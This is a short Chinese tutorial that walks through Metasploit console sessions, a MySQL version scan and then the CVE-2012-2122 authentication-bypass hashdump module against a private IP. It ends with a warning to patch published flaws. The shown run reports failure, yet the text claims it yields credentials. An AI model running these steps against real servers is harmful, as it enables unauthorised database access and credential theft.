用Metasploit破解Mysql用户名和密码

　　假设我们得到了一个Mysql为5.1.61， 5.2.11， 5.3.5， 5.5.22的数据库(下面这个只是操作过程，数据库版本不是含漏洞版本)
msf > use auxiliary/scanner/mysql/mysql_version
msf auxiliary(mysql_version) > show options
Module options (auxiliary/scanner/mysql/mysql_version):
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOSTS                    yes       The target address range or CIDR identifier
RPORT    3306             yes       The target port
THREADS  1                yes       The number of concurrent threads
msf auxiliary(mysql_version) > set RHOSTS 10.199.128.61
RHOSTS => 10.199.128.61
msf auxiliary(mysql_version) > set THREADS 5
THREADS => 5
msf auxiliary(mysql_version) > exploit
[*] 10.199.128.61:3306 is running MySQL 5.5.44-log (protocol 10)
[*] Scanned 1 of 1 hosts ( complete)
[*] Auxiliary module execution completed
　　第一步是获取mysql version。第二步便配置Mysql的IP和端口可以exploit了(事实上有IP足够了，所有端口开放的服务都能扫描得到)
msf auxiliary(mysql_hashdump) > search CVE-2012-2122
Matching Modules
================
Name                                               Disclosure Date  Rank    Description
----                                               ---------------  ----    -----------
auxiliary/scanner/mysql/mysql_authbypass_hashdump  2012-06-09       normal  MySQL Authentication Bypass Password Dump
msf auxiliary(mysql_hashdump) > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf auxiliary(mysql_authbypass_hashdump) >
msf auxiliary(mysql_authbypass_hashdump) >
msf auxiliary(mysql_authbypass_hashdump) > show options
Module options (auxiliary/scanner/mysql/mysql_authbypass_hashdump):
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
RHOSTS                     yes       The target address range or CIDR identifier
RPORT     3306             yes       The target port
THREADS   1                yes       The number of concurrent threads
USERNAME  root             yes       The username to authenticate as
msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 10.199.128.61
RHOSTS => 10.199.128.61
msf auxiliary(mysql_authbypass_hashdump) > exploit
[+] 10.199.128.61:3306 The server allows logins， proceeding with bypass test
[*] 10.199.128.61:3306 Authentication bypass is 10% complete
[*] 10.199.128.61:3306 Authentication bypass is 20% complete
[*] 10.199.128.61:3306 Authentication bypass is 30% complete
[*] 10.199.128.61:3306 Authentication bypass is 40% complete
[*] 10.199.128.61:3306 Authentication bypass is 50% complete
[*] 10.199.128.61:3306 Authentication bypass is 60% complete
[*] 10.199.128.61:3306 Authentication bypass is 70% complete
[*] 10.199.128.61:3306 Authentication bypass is 80% complete
[*] 10.199.128.61:3306 Authentication bypass is 90% complete
[*] 10.199.128.61:3306 Authentication bypass is complete
[-] 10.199.128.61:3306 Unable to bypass authentication， this target may not be vulnerable
[*] Scanned 1 of 1 hosts ( complete)
[*] Auxiliary module execution completed
　　然后这样这么简单，你会得到一个用户名和密码。
　　-------------------
　　想想看，假设你的数据库有漏洞，别人有你一个公网IP，能获取你的数据库信息。。。所以，网上公布重大漏洞时，不要置身事外。